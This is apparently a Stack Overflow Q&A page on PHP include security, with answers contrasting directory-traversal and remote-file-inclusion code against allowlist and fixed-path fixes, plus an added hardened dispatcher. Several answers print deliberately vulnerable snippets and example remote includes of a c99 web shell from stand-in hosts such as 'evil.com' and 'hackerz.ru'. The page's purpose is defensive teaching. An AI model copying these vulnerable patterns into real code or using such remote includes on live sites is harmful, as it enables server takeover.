11

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that. So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

Thanks in advance.

Alan
user1327735
    If a person has access to your PHP code, they are in your server. There is no point in securing something that's already compromised. Instead, focus on closing up the entry points by, for example, fixing all of your application's SQL injection vulnerabilities. – Blender Apr 13 '12 at 21:10
  • The point is, I heard that the 'include "something.php"' is insecure or hackable, as well as SQL injections. Is it true? – user1327735 Apr 13 '12 at 21:12
  • Anything is exploitable if you use it incorrectly. As long as you are `include`ing static PHP files, you really have nothing to worry about in that area. – Blender Apr 13 '12 at 22:41

7 Answers

19

It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (Directory Traversal)

<?php 
include($_GET['file']);
?>

Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially Insecure ( *.php files are vulnerable )

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>
Lawrence Cherone
4

The biggest issue with includes is likely changing the filename extension from PHP to something that doesn't get automatically executed by the web server. For example, library.inc or config.inc. Invoking these files with a web browser will reveal the code instead of executing it, and any passwords or exploitable hints will be shown.

Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.

There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.

Otherwise, ensure that you don't include a file that's submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.

pp19dd
  • +1 Nice note about file extensions that can be included as code, but when loaded separately in the browser will expose your code. – DampeS8N Apr 13 '12 at 21:21
  • What do you mean by "invoking these files with a web browser"? Say you have a server with public name "example.com". (1) If someone knows there's a file in the root directory called "a.inc", can they just look at it with "`http://example.com/a.inc`"? (2) If they don't know what .inc files exist in a given directory, how would they find out? – Alan Mar 27 '14 at 20:26
3

Include can be abused if you do something like this:

include($_GET["page"]);

and then call the URL:

myscript.php?page=index.php

attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.

include itself is perfectly safe. Just make sure to always validate/escape your input.

Halcyon
3

Anything server side (assuming your server isn't compromised) is safe. Doing this:

Insecure

$var = $_GET['var'];
include $var . ".php";

Secure

include "page.php"; 
Dexter
Blake
2

Include is safe provided you don't:

  1. Include a remote file like www.someoneelsesssite.com/something.php
  2. Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
  3. Include a file from another possibly tainted source like a database.

2 and 3 technically have the caveat that if you disallow . or / (or \ on Windows) you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.

As pp19dd's answer points out, it is also vital that you name your includes with the .php extension. If you've set Apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.

DampeS8N
  • @FritsvanCampen agreed, but as a general rule I try to answer these from the standpoint that anyone who needs to be asking this, isn't ready to take risks of any sort. If any part of your code is 'magic' you shouldn't take risks. (by magic, I mean it works based on a mechanic you don't understand) – DampeS8N Apr 13 '12 at 21:18
0

The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }
mseancole
  • This will not protect you against anything. Your passwords file is a file, php.ini is a file, all the things attackers would find, are files. – DampeS8N Apr 13 '12 at 21:20
  • @DampeS8N: I was not trying to imply that this was the only thing to do, only that it was a step in the process. I also included a comment about inserting other code, "user verification and such". User verification helps ensure that no "member" sensitive pages are accessed. The other code could be a file blacklist. I do not know why you downvoted my answer when your answer was just as vague. – mseancole Apr 13 '12 at 21:31
  • People who don't know how to secure against Directory Traversal attacks shouldn't attempt to include files dynamically under any conditions. Your answer suggests the 'best' thing you can do is ensure the file exists. The relevant security information isn't vague, it is absent. I did not downvote you to hurt you, and I will undownvote if you add the needed information. And remove your downvote of my answer or leave a comment as to what you think is vague. – DampeS8N Apr 13 '12 at 21:34
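The following dispatcher is an added example, not code from any answer above; it combines Lawrence Cherone's allowlist, DampeS8N's "no path characters from the client" rule, and a realpath containment check that shows why mseancole's is_file() test is not enough on its own. It assumes a hypothetical layout in which this script sits in the web root and the include files live in ../includes, outside the document root, so they cannot be fetched directly whatever their extension (pp19dd's .inc concern).

```php
<?php
// Added example (not from any answer on this page): a page dispatcher that
// only ever includes files from a fixed allowlist, with a realpath check as
// a second layer. Assumed layout: this file is in the web root and the
// include files live in ../includes, i.e. outside the document root, so
// they cannot be fetched directly whatever their extension.
declare(strict_types=1);

// Public slug => file name. The client never supplies a path, only a key.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a slug to an absolute path inside $baseDir, or return null.
 * Returning null (and including nothing) is the safe default.
 */
function resolvePage(string $slug, string $baseDir): ?string
{
    // Layer 1: allowlist. "../config.inc", "http://...", "php://filter..."
    // are all rejected here simply because they are not keys of PAGES.
    if (!array_key_exists($slug, PAGES)) {
        return null;
    }
    // Layer 2: containment. realpath() collapses ".." and symlinks, and
    // returns false for missing files. is_file() alone is not enough: it
    // is true for /etc/passwd and for a config file one directory up.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGES[$slug]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$slug = $_GET['page'] ?? 'home';
if (!is_string($slug)) {          // ?page[]=x arrives as an array; treat as invalid
    $slug = '';
}
$file = resolvePage($slug, __DIR__ . '/../includes');
if ($file === null) {
    // Log the rejected value for detection, but never echo it back raw.
    error_log('include rejected for page=' . var_export($slug, true));
    http_response_code(404);
    exit;
}
include $file;
```

Leaving allow_url_include at its default of Off in php.ini adds a third layer: include then refuses http:// and ftp:// targets regardless of what the application code does.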
-2

I'm using this method.

<?php include (dirname(__FILE__).'/file.php');
husnixs
  • I hope that works for you, but for the sake of a better answer you can actually **explain** why this works – jean Jul 02 '15 at 18:14